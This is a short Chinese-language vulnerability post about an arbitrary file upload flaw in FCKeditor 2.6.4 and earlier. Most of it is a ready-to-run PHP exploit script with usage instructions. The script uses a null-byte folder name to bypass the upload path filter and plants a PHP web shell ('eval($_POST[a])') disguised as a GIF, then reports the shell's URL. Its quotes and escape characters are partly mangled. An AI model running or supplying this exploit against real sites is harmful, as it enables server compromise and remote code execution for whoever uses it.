fckeditor <= 2.6.4 任意文件上传漏洞
简要描述:
fckeditor <= 2.6.4 任意文件上传漏洞, php coldfunsion应该KO了,asp表示很淡定,其他语言版本未测
详细说明:
currentfolder过滤不给力啊,但是GPC就能让它脑残
代码
<?
error_reporting(0);
set_time_limit(0);
ini_set(“default_socket_timeout”, 5);
define(STDIN, fopen(“php://stdin”, “r”));
$match = array();
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print “n[-] No response from {$host}:80 Trying again…”;
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
print $resp;
return $resp;
}
function connector_response($html)
{
global $match;
return (preg_match(“/OnUploadCompleted((d),”(.*)”)/”, $html, $match) && in_array($match[1], array(0, 201)));
}
print “n+——————————————————————+”;
print “n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ |”;
print “n+——————————————————————+n”;
if ($argc < 3)
{
print “nUsage……: php $argv[0] host pathn”;
print “nExample….: php $argv[0] localhost /n”;
print “nExample….: php $argv[0] localhost /FCKEditor/n”;
die();
}
$host = $argv[1];
$path = ereg_replace(“(/){2,}”, “/”, $argv[2]);
$filename = “fvck.gif”;
$foldername = “fuck.php%00.gif”;
$connector = “editor/filemanager/connectors/php/connector.php”;
$payload = “—————————–265001916915724rn”;
$payload .= “Content-Disposition: form-data; name=”NewFile”; filename=”{$filename}”rn”;
$payload .= “Content-Type: image/jpegrnrn”;
$payload .= ‘GIF89a’.”rn”.'<?php eval($_POST[a]) ?>’.”n”;
$payload .= “—————————–265001916915724–rn”;
$packet = “POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=”.$foldername.” HTTP/1.0rn”;
//print $packet;
$packet .= “Host: {$host}rn”;
$packet .= “Content-Type: multipart/form-data; boundary=—————————265001916915724rn”;
$packet .= “Content-Length: “.strlen($payload).”rn”;
$packet .= “Connection: closernrn”;
$packet .= $payload;
print $packet;
if (!connector_response(http_send($host, $packet))) die(“n[-] Upload failed!n”);
else print “n[-] Job done! try http://${host}/$match[2] n”;
?>